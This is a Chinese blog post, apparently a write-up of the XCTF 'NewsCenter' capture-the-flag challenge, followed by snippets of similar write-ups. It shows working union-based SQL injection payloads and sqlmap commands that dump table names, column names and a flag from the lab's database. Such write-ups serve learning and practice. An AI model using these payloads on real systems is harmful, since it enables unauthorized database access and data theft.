web大手子炼成记之NewsCenter

最新推荐文章于 2022-01-17 10:54:49 发布
最新推荐文章于 2022-01-17 10:54:49 发布
阅读量177 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43579362/article/details/104167285
版权

xctf

NewsCenter

打开题目新闻搜索页面,显然存在sql注入

开始注入,首先看看表有多少列(因为union查询的时候需要和主查询的列数相同),依次构造payload 1’order by 1#,1’order by 2#。。。。回显都正常,当payload为1'order by 4#的时候出现异常,所以说明一共有3列!
开始union查询,首先查看当前数据库所有表名,构造payload 1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#,结果如下
在这里插入图片描述
看到了一个secret_table,嘻嘻,再来看看所有列列名吧,构造payload 1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='secret_table'# ,查询结果如下:
在这里插入图片描述
哟,这不是flag列吗,直接查询,构造payload 1'union select 1,2,fl4g from news.secret_table#,得到flag!
在这里插入图片描述

··KElis
关注
XCTF:NewsCenter
m0_64898960的博客
03-18 4117
xctf 因为有输入框,我习惯初步判断它为sql注入 1.测试是否存在注入点,输入 1' 结果报错了,然后尝试 1" 2.知道存在注入,且为字符型注入。然后进行字段数猜测 直到字段数为4开始报错 3.尝试获得显示位 4.查库名 5.查表名 6.查列名 7.获取flag 到这里本题就已经解出来了,下面是我在上面用到的sql语句。 1' 1" 1'order by 1# -1'union select 1,2,3# -1'uni...
攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 264
攻防世界 WEB NewsCenter NewsCenter:   题目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
XCTF_NewsCenter
TA不懒,但还没有添加简介
01-17 2990
XCTF_NewsCenter
xctf-web-NewsCenter
Spwpun的博客
03-30 2255
一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解: 查询当前数据库中的所有表名: 1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_...
XCTF NewsCenter wp
weixin_45253216的博客
01-08 405
2021.1.8 网安菜鸡今天来划水了! 很久以前的一道题,因为打开环境一直出错,所以一直拖到现在。CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 打开环境,是一个搜索页面,有一个Search News的搜索框,盲猜sql注入。 在搜索框输入搜索内容,url不变,所以应该是post注入。话不多说,sqlmap安排! First:sqlmap进行POST注入的两种方式 可能有3,4,5种,能力有限,先学两个 方法一:自动搜索表
XCTF web NewsCentersqlmap简单使用)
H4ppyD0g的博客
09-12 754
打开网页是一个查询操作的输入框,判断应该存在sql注入。 随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面 之后用到sqlmap sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名 可以爆出两个库 sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据 sql部分常用参数 ...
攻防世界-NewsCenter
weixin_46784800的博客
11-12 1517
攻防世界-NewsCenter题 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。 首先,通过order语句,判断查询
去除cnewscenter弹窗_攻防世界 web进阶区 NewsCenter
weixin_39874379的博客
12-22 9259
攻防世界 web进阶区 NewsCenter解题首先我们打开网页,发现题目中只有一个搜索框,然后通过查看源代码等方式都无法获得任何有用的信息。所以题目肯定是从这个搜索框入手的,那么就首先抓包试试。抓到这样一些数据,但是经过尝试也没有什么办法获取信息,只发现了搜索使用的是post请求。最后想到了一般这样的搜索框可能会存在sql注入,所以及逆行尝试。但是由于手注的技术实在是太差了,就先用sqlmap来...
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
《PyPI官网下载 | newscenter-2.0.4.tar.gz——深入了解Python库的发布与使用》 在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python...
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1217
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
XCTF-NewsCenter(SQL注入解析)
weixin_44823018的博客
01-10 1097
这是一道关于SQL注入的题目。
2020.3.29 xctf(NewsCenter)①
DSR446的博客
03-29 431
打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入 这里我们介绍两种手动和sqlmap ①手动测: 我们这里先用order by 手动测字段数,发现当4的时候页面就不能正常显示了,所以这里应该是3。 查询当前数据库中的所有表名: 1' union select 1,2,group_concat(table_name) from information_schema.tables where ...
XCTF攻防世界web进阶练习_ 1_NewsCenter
silence1_的博客
04-30 3063
XCTF攻防世界web进阶练习—NewsCenter 题目 题目是NewsCenter,没有提示信息。 打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。 随便输入123,用burp抓包,发现是post方式,因为sql注入技术太菜,直接用sqlmap爆破。 将http头保存为1.txt,试试用sqlmap爆数据库 ...
XCTF WEB robots
无限迭代中......
06-30 1935
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5063 题解: 参考文章:Robots协议 访问http://111.198.29.45:47041/robots.txt 再访问http://111.198.29.45:47041/f1ag_1s_h3re.php ...
XCTF WEB mfw
A_dmin的博客
06-03 4500
XCTF WEB mfw 比赛打自闭了,需要好好学习 打开网页看见(猜测git源码泄露): 在URL后面加上./git发现: 使用脚本,在Linux环境中: pip install requests git clone https://github.com/wangyihang/GitHacker.git python GitHacker.py [Website] 得到源码: flag...
XCTF 3rd-GCTF-2017 hackme
qq_41071646的博客
05-07 1741
这个题 有字符串 感觉简单了许多 然后这个题 算法就在这 我们写出来脚本就行 #include <stdio.h> #include<iostream> #include<iomanip> #include<stdio.h> #include<string.h> #include<algorithm> #incl...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4293
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
XCTF-高手进阶区:mfw
1stPeak's Blog
06-13 3853
XCTF-高手进阶区-第三题:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
攻防世界 newscenter
最新发布
09-08
攻防世界的NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界的NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值